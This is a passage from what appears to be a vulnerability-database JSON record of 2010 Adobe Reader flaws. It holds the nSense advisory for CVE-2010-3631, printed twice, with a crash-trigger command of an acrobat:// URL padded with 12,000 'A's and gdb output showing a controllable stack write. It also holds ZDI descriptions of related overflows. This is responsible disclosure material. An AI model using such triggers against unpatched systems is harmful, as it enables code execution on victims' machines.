EXC_BAD_ACCESS, Could not access memory.\r\n Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2\r\n 0x7ffa0d6a in AcroBundleThreadQuitProc ()\r\n (gdb) set disassembly-flavor intel\r\n (gdb) x/i $pc\r\n 0x7ffa0d6a <AcroBundleThreadQuitProc+2608>: mov BYTE PTR\r\n [ebp+eax-0x420],0x0\r\n (gdb) i r ebp eax\r\n ebp 0xbfffe908 0xbfffe908\r\n eax 0x2eea 12010\r\n (gdb)\r\n\r\n As can be seen from the above, we control the value in eax (in\r\n this case 12010, the length of the acrobat:// + the 12000 A's).\r\n\r\n This allows us to write the null byte anywhere in memory between\r\n ebp-0x420 (0xBFFFE4E8) and the end of the stack.\r\n\r\n The behaviour may be leveraged to modify the frame pointer,\r\n changing the execution flow and thus permitting arbitrary code\r\n execution in the context of the user running the program.\r\n\r\n Timeline:\r\n Aug 10th Contacted vendor PSIRT\r\n Aug 10th Vendor response. Vulnerability reproduced.\r\n Aug 16th Status update request sent to vendor\r\n Aug 17th Vendor response, still investigating\r\n Sep 2nd Status update request sent to vendor\r\n Sep 3rd Vendor response. Working on fix\r\n Sep 22nd Contacted vendor regarding patch date\r\n Sep 22nd Vendor response. Confirmed patch date.\r\n Sep 23rd Corrected researcher name\r\n Oct 1st Vendor sent CVE identifier CVE-2010-3631\r\n Oct 5th Vendor releases the patch\r\n Oct 6th Advisory published\r\n\r\n http://www.nsense.fi http://www.nsense.dk\r\n\r\n\r\n\r\n $$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s.\r\n $$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$\r\n $$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$\r\n $$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$\r\n $$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P\r\n\r\n D r i v e n b y t h e c h a l l e n g e _\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-69981"}], "zdi": [{"lastseen": "2020-06-22T11:41:42", "bulletinFamily": "info", "cvelist": ["CVE-2010-3622"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required in that a target must be coerced into opening a file or visiting a web page. The specific flaw exists within the ACE.dll module responsible for parsing ICC streams. Within the 'desc' tag there exists an embedded 'mluc' data structure. The code within ACE performs arithmetic on the second DWORD from the mluc structure and a value from the desc structure. The resulting integer is used for an allocation of a heap-based buffer. An attacker can forge these values to force the process to under-allocate this buffer and later overflow it during a copy operation. This leads to remote code execution under the context of the user running the application.", "modified": "2010-06-22T00:00:00", "published": "2010-10-06T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-192/", "id": "ZDI-10-192", "title": "Adobe Acrobat Reader ICC mluc Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:08", "bulletinFamily": "info", "cvelist": ["CVE-2010-3632"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the application explicitly trusting a string's length embedded within a particular file format. The application will duplicate an arbitrarily sized string into a statically sized buffer located on the stack. This can lead to code execution under the context of the application.", "modified": "2010-06-22T00:00:00", "published": "2010-10-06T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-193/", "id": "ZDI-10-193", "title": "Adobe Acrobat Reader Multimedia Playing Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:41", "bulletinFamily": "info", "cvelist": ["CVE-2010-3621"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required in that a target must be coerced into opening a file or visiting a web page. The specific flaw exists within the ACE.dll module responsible for parsing ICC streams. When processing an ICC stream, the process performs math on two DWORD values from the input file. If these values wrap over the maximum integer value of 0xFFFFFFFF a mis-allocation can occur. Later, the process uses one of the original DWORD values as a size to a copy function. This can be abused by an attacker to overflow a stack buffer and subsequently execute code under the context of the user running the process.", "modified": "2010-06-22T00:00:00", "published": "2010-10-06T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-191/", "id": "ZDI-10-191", "title": "Adobe Reader ICC Parsing Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Acrobat and Reader - Array Indexing Remote Code Execution", "edition": 1, "published": "2010-10-06T00:00:00", "title": "Adobe Acrobat and Reader - Array Indexing Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3631"], "modified": "2010-10-06T00:00:00", "id": "EXPLOITPACK:419DFE7EE81792279DA8C40D02DF5613", "href": "", "sourceData": " nSense Vulnerability Research Security Advisory NSENSE-2010-001\n ---------------------------------------------------------------\n\n Affected Vendor: Adobe\n Affected Product: Adobe Reader 9.3.4 for Macintosh\n Platform: OS X\n Impact: User assisted code execution\n Vendor response: Patch\n Credit: Knud / nSense\n \n Description: Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected.\n\n NOTE: This issue only affects Adobe Reader and Acrobat running on Apple Mac OS X \n\n Technical details\n ---------------------------------------------------------------\n\n terminal 1:\n $ gdb --waitfor=AdobeReader\n\n terminal 2:\n $ open acrobat://`perl -e 'print \"A\" x 12000'`\n\n terminal 1:\n (gdb) cont\n [snip]\n Program received signal EXC_BAD_ACCESS, Could not access memory.\n Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2\n 0x7ffa0d6a in AcroBundleThreadQuitProc ()\n (gdb) set disassembly-flavor intel\n (gdb) x/i $pc\n 0x7ffa0d6a <AcroBundleThreadQuitProc+2608>: mov BYTE PTR\n [ebp+eax-0x420],0x0\n (gdb) i r ebp eax\n ebp 0xbfffe908 0xbfffe908\n eax 0x2eea 12010\n (gdb)\n\n As can be seen from the above, we control the value in eax (in\n this case 12010, the length of the acrobat:// + the 12000 A's).\n\n This allows us to write the null byte anywhere in memory between\n ebp-0x420 (0xBFFFE4E8) and the end of the stack.\n\n The behaviour may be leveraged to modify the frame pointer,\n changing the execution flow and thus permitting arbitrary code\n execution in the context of the user running the program.\n\n Timeline:\n Aug 10th Contacted vendor PSIRT\n Aug 10th Vendor response. Vulnerability reproduced.\n Aug 16th Status update request sent to vendor\n Aug 17th Vendor response, still investigating\n Sep 2nd Status update request sent to vendor\n Sep 3rd Vendor response. Working on fix\n Sep 22nd Contacted vendor regarding patch date\n Sep 22nd Vendor response. Confirmed patch date.\n Sep 23rd Corrected researcher name\n Oct 1st Vendor sent CVE identifier CVE-2010-3631\n Oct 5th Vendor releases the patch\n Oct 6th Advisory published\n\n http://www.nsense.fi http://www.nsense.dk\n\n\n\n $$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s.\n $$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$\n $$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$\n $$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$\n $$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P\n\n D r i v e n b y t h e c h a l l e n g e _", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:50", "bulletinFamily": "info", "cvelist": ["CVE-2010-2883", "CVE-2010-3333", "CVE-2012-4681"], "description": "None\n", "modified": "2013-12-13T14:02:26", "published": "2013-12-13T02:59:00", "id": "THN:3BF9400C51248462741DFA3EAF706DEE", "href": "https://thehackernews.com/2013/12/chinese-hackers-spied-on-european.html", "type": "thn", "title": "Chinese Hackers spied on European Diplomats during recent G20 meetings", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
